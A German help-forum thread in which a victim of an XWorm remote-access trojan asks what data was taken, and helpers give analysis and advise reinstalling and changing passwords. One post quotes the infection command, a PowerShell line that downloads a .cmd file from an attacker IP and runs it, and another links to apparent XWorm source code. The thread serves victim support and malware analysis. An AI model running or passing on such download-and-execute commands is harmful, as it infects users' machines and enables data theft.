![]() |
Rat Trojaner brauche Leute mit Erfahrung File: win12.exe Checksum Trojaner File: 6f32596ebd4cb3ac5feb00f1b3f71ed03eb28db04df44d878c6531240b1f3171 Analyze Provider: virustotal,intezer Hallo Ich habe mir einen Rat Trojaner eingefangen. Danach habe ich einmal virustotal und intezer drauf losgelassen. Ich habe auch schon verdächtige Dateien im temp Ordner gefunden ( genau die, die virustotal als dropped Files aufzeigt) . Irgendwann wo ich es gemerkt habe habe ich alles gekappt aber das temp Verzeichnis spricht schon eine deutliche Sprache. Ich will also nicht wissen, ob ich einen Trojaner habe sondern wieviel schaden er schon angerichtet hat das beste wäre ein honeypot und jemand führt die Befehle aus die ich blöderweise eingegeben habe. Bin kir auch nicht sicher ob ich hier richtig bin , oder ich habe irgendwie die Möglichkeit auf meiner Kiste zu schauen welche Daten runtergeladen worden sind. Bin mir auch nicht sicher ob ich hier richtig bin. Beste Grüße |
:hallo: Vielen Dank für deine Anfrage. Wir entfernen hier Malware. Wenn du deinen Rechner säubern möchtest, bist du hier richtig. Zitat:
Es gibt so viele verschiedene Malwarefamilien mit diversen Untergruppen, die alles Mögliche abgreifen, angefangen bei Zugangsdaten/Passwörter jeglicher Art über Miner bis hin zu CryptoStealern. Research Teams von Sicherheitsfirmen wie Malwarebytes, Microsoft oder Kaspersky können mit Sicherheit sagen, welche Art von Daten diese oder jede Malware abzieht (wenn Sie ALLE dafür notwendigen schädlichen Elemente kennen), aber eine Bezifferung des tatsächlichen Schadens auf deinem System wird auch für die kaum möglich sein. Das was du hier im Sinn hast, wird dir nicht gelingen. Fazit Die Malware muss runter vom System, so schnell wie möglich. Alle Zugangsdaten und Passwörter sollten nach der Bereinigung bzw. nach der Neuinstallation zurückgesetzt bzw. geändert werden. Nachtrag Mindestens genau so wichtig ist, dass du weißt, wie die Malware auf dein System gekommen hast, damit so etwas nicht nochmal passiert. |
Zitat:
Ich habe sogar soviel Infos das ich das 1:1 mit einem Honeypot wiederholen koennte, habe auch schon drueber nachgedacht mit einem Linux und eriner VM einen aufzusetzen. Aber ich denke mir wuerde es schon reichen wie der Trojaner agiert also ob er zB. erst verschluesselt oder eher auf Stehlen von Daten spezialisert ist etc. Aber du meintest ja das es sehr viele Unterarten gibt von Trojanern aber eigentlich dachte ich auch wenn dieseelbe Pruefsumme auftaucht das es exakt derselbe ist. Beste gruesse |
Zitat:
|
Der Angreifer bekommt via Telegram eine Nachricht über die gelungene Attacke neben ein paar Eckdaten wie Betriebssystem etc.. Es liegt an ihm, wie er das RAT einsetzt. XWorm ist mächtig. Das kann man z.B. hierdurch https://github[.]com/d00mt3l/XWorm-5.6/archive/refs/heads/main.zip in weiten Teilen nachvollziehen. |
Zitat:
HTML-Code: Test: Powershell -Command "Invoke-Webrequest 'hxxp://172.245.20.209/win12.cmd' -OutFile troubleshoot.cmd" && troubleshoot.cmd Code: @echo off |
Skriptbasierte Malware... bisschen cmd, vbs und ps. Ähnliche Payloads habe ich schon öfter gesehen. Ist sogar noch aktiv... |
Guten Abend, das ist nur das Vorgeplänkel. Relevant: win12.exe->bound.exe->code injection, auf meiner Testkiste Edge. Der Keylogger ist aktiviert. Die Log.tmp befindet sich hier %TEMP%, wenn sie noch nicht gelöscht wurde. |
Zitat:
Zitat:
Das ist ja das, was den TO interessiert. Du sagtest ja: Zitat:
|
Zitat:
Wichtig für den Hilfesuchenden wäre %TEMP%\Log.tmp. Welche Funktionen des RATs der Angreifer im Einzelfall genau benutzt, weiß nur er. Allein schon die Möglichkeit, weitere Malware zu installieren, bietet enormes Potenzial. |
Zitat:
Code:
|
Na dann weißt du ja schon mal in etwa, welche Daten mit Sicherheit abgeflossen sind. Nur welchen Nutzen hat dieses Wissen jetzt ganz konkret für dich? Zitat:
moejoejoe, du kannst also nicht ausschließen, dann noch weitere Daten abgegriffen wurden. Damit ist eine Neuinstallation sowie das Ändern aller Passwörter meiner Meinung nach alternativlos. Ich werde zwar nie verstehen, warum manche Menschen, sei es nun durch das Ausführen fragwürdiger Dateien oder Befehle oder durch der Verwendung illgaler Software, so fahrlässig mit ihren Daten umgehen. Aber damit habe ich mich abgefunden. Dann hoffe ich für dich, moejoejoe, dass du was daraus gelernt hast und nicht wie so viele andere Nutzer beratungsresistent bist. Alles Gute. |
Ich hatte was vergessen ich habe ab dem Zeitpunkt meine Verbindung gekappt aber der keylogger ist noch mitgelaufen war genau 10 Min. dem RAT Angriff ausgesetzt. Insofern ist per Keylogger nichts weiter Rausgegangen. Code: ### SearchApp ### Zitat:
Falls du zu denen Menschen gehoerst denen das noch nie passiert ist dann glueckwunsch du bist dann einer von ganz wenigen. Dass das saudaemmlich von mir war das weiss ich selbst. Ich danke fuer deine Hilfe und den Support. B2T: Gibt es eine Moeglichkeit im nachhinein irgendeinem Trace zu folgen das evtl das OS selbst setzt sodass man doch nachvollziehen kann was downgeloadet wurde. Beste gruesse |
Zitat:
Zitat:
Und hier das Gleiche für Windows 11: Zitat:
Und wenn er die Windows Neuinstallation hat und alles fertig ist, ein Backup/Image Programm installieren und damit eine Sicherung vom Windows auf eine externe USB Festplatte machen. |
Jungs ich will hier keinen Streit ich hätte auch am liebsten meinen persönlichen. Wieder gelöscht das könnte. Ich aber im Nachhinein nicht mehr, da es hier nix zu suchen hat. Insofern war es nur meine pers. IMHO Zitat:
Ich bin mir bewusst das selbst damit ein Restrisiko besteht, ich muss aber abwägen ( gerne auch aufgrund von mehr Spezialisten knowhow) was mir wichtig ist. @_698: Wenn ich das richtig verstehe, hast du ein kl Testsystem aufgesetzt, waere es theoretisch möglich ein hidden os in den 10 min zu hinterlegen sodass es egal wäre ob ich das komplette Netzwerk deaktiviere ?. Beste Grüsse |
Alle Zeitangaben in WEZ +1. Es ist jetzt 00:23 Uhr. |
Copyright ©2000-2025, Trojaner-Board